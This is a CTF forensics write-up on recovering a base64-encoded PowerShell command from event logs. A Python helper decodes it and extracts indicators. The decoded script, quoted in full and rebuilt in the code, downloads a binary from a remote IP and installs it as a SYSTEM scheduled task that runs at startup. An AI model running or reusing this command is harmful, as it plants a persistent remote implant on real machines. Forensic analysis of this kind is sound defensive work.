Wimdows 4 - author: deltabluejay - forensics

WriteUp: Eliot, Rubisk and tinderbox.

For this step, we once again explored the base64-encoded commands in the PowerShell event logs. We found and decoded this log:

$BINARY='C:\Windows\System32\update.exe';
$ProgressPreference = 'SilentlyContinue';
Invoke-WebRequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $BINARY;
schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest;
schtasks /run /tn "updates"

We found this binary still in Windows\System32, and put it on VirusTotal. We found that it was the Sliver framework, and used the IP in the log.
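The decode-and-triage step described above, as an added example that is not part of the original writeup: a small Python helper that pulls an -EncodedCommand argument out of a command-line log field, base64-decodes it as UTF-16LE (the encoding PowerShell expects for that switch, with a UTF-8 fallback), and then extracts the indicators a responder would pivot on: the download URL, the dropped file path, the scheduled-task name, and whether the task is registered to run as SYSTEM. The log line is constructed here from the script shown above; the field name and the set of flag spellings handled are assumptions.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed fixture: the decoded script from the log above, re-encoded the
# way "powershell -EncodedCommand" expects it (UTF-16LE, then base64).
SCRIPT = (
    "$BINARY='C:\\Windows\\System32\\update.exe';"
    "$ProgressPreference = 'SilentlyContinue';"
    "Invoke-WebRequest -Uri \"http://192.168.1.107:8000/update.exe\" -OutFile $BINARY;"
    "schtasks /create /tn \"updates\" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest;"
    "schtasks /run /tn \"updates\""
)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand consumes it (UTF-16LE + base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed log line mimicking a process-creation command-line field
# (assumed field name; the event source is not specified here).
SAMPLE_LOG = (
    "CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass "
    f"-EncodedCommand {encode_command(SCRIPT)}"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen in logs. Whitespace after the switch is required so
# that "-ExecutionPolicy" is not mistaken for "-e".
ENC_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+")
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\";]+")
TASK_RE = re.compile(r"schtasks\s+/create[^;]*?/tn\s+[\"']?([^\"'\s]+)", re.IGNORECASE)
SYSTEM_RE = re.compile(r"/ru\s+['\"]?SYSTEM", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """Base64-decode a blob and pick the text encoding from its byte pattern."""
    raw = base64.b64decode(b64, validate=True)
    # UTF-16LE text from an ASCII script has a null in every high byte; if most
    # odd positions are zero, treat it as UTF-16LE, otherwise fall back to UTF-8
    # (scripts that use [Convert]::FromBase64String on a plain string).
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


@dataclass
class Findings:
    script: str
    urls: List[str] = field(default_factory=list)
    paths: List[str] = field(default_factory=list)
    tasks: List[str] = field(default_factory=list)
    runs_as_system: bool = False


def analyze_log_line(line: str) -> Optional[Findings]:
    """Return decoded script and extracted indicators, or None if no encoded command."""
    m = ENC_RE.search(line)
    if not m:
        return None
    script = decode_encoded_command(m.group(1))
    found = Findings(script=script)
    found.urls = URL_RE.findall(script)
    found.paths = sorted(set(PATH_RE.findall(script)))
    found.tasks = TASK_RE.findall(script)      # only /create, not /run
    found.runs_as_system = SYSTEM_RE.search(script) is not None
    return found


if __name__ == "__main__":
    result = analyze_log_line(SAMPLE_LOG)
    if result is None:
        print("no encoded command found")
    else:
        print("decoded script:\n ", result.script)
        print("urls:   ", result.urls)
        print("paths:  ", result.paths)
        print("tasks:  ", result.tasks)
        print("SYSTEM: ", result.runs_as_system)
```

Running the block prints the recovered script along with the download URL, the dropped path under System32, the task name and the fact that it is registered as SYSTEM: exactly the pivots used in the writeup (hash the file on disk, block or hunt the IP, remove the task).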